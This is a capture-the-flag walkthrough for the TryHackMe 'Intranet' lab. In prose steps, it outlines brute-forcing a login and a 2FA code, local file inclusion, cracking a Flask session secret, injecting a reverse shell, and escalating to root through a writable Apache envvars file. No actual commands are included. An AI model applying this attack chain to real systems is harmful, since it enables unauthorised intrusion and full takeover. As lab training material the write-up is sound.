Intranet Discussion [WRITE-UP]

TryHackMe
1

Let’s discuss Intranet.

2

Recon and Initial Access

  1. Port Discovery
    Conduct an Nmap scan to identify open ports. Pay close attention to ports 80 and 8080 for web applications.

  2. Explore Web Application on Port 8080
    Visit the site on port 8080 and observe the login page. Inspect the source code for potential usernames.

  3. Password Cracking Preparation
    Create users.txt with discovered usernames, including a possible admin email. Form a base.txt with potential passwords for brute forcing.

  4. Modify /etc/hosts
    Add the machine’s IP to your /etc/hosts file for easier access.

  5. Generate Password Wordlist
    Utilize John the Ripper to create a password list from base.txt using a custom rule.

  6. Brute Force Login Page
    Use Hydra to attempt to login to the web application with your users.txt and generated password list, looking for valid credentials.

Two Factor Authentication

  1. 2FA Code Generation
    With valid credentials obtained, generate a 4-digit combination using Crunch to brute force the 2FA code.

  2. Extract Session Cookie
    Obtain the JWT session cookie to maintain your session while testing the /sms endpoint.

  3. Brute Force 2FA Code
    Leverage Wfuzz with the generated 4-digit combinations and the session cookie to find the correct 2FA code.

Local File Inclusion and Source Code Access

  1. Identify LFI Vulnerability
    Investigate the application for any LFI opportunities, specifically around the Update button functionality.

  2. Read Sensitive File
    Exploit the LFI vulnerability to read the contents of /etc/passwd.

  3. Locate Application Source
    Use information from /proc/self/stat to find the path of the Python application, extracting app.py via LFI.

Cracking the Flask Secret Key

  1. Analyze Flask Application
    In app.py, identify how the JWT session cookie secret key is generated. This is crucial for further exploits.

  2. Generate Secret Key Wordlist
    Create a flask_base.txt and utilize John to produce a wordlist containing possible secret keys.

  3. Crack JWT Sessions
    Employ flask-unsign to decode JWT tokens, gaining access and confirming logged in status as admin.

Exploiting Admin Panel

  1. Post-Request Shell Injection
    Use a crafted cURL command to send a POST request to the admin endpoint, injecting a reverse shell command.

  2. Set Reverse Shell Listener
    Prepare a listener on your machine to capture the shell from the admin panel.

Lateral Movement and Privilege Escalation

  1. Investigate Apache Running User
    Verify that the Apache service is running as the user anders. Check the document root for write permissions.

  2. Upload PHP Reverse Shell
    Create a PHP reverse shell on the web server. Transfer it using nc and verify functionality.

  3. Connect as User anders
    Use the shell to navigate and retrieve the second user flag from anders’s home directory.

  4. Sudo Permission for Apache Restart
    Discover that you can restart the apache2 service with sudo permissions. Identify writable files in /etc/apache2.

  5. SSH Access via Key
    Add your SSH public key to anders’ authorized keys to gain access.

  6. Exploit Writable envvars File
    Modify the /etc/apache2/envvars file to create a reverse shell, then restart Apache to execute your code.

  7. Capture Root Shell
    After the Apache restart, obtain a shell as root and retrieve the final flag from the /root/ directory.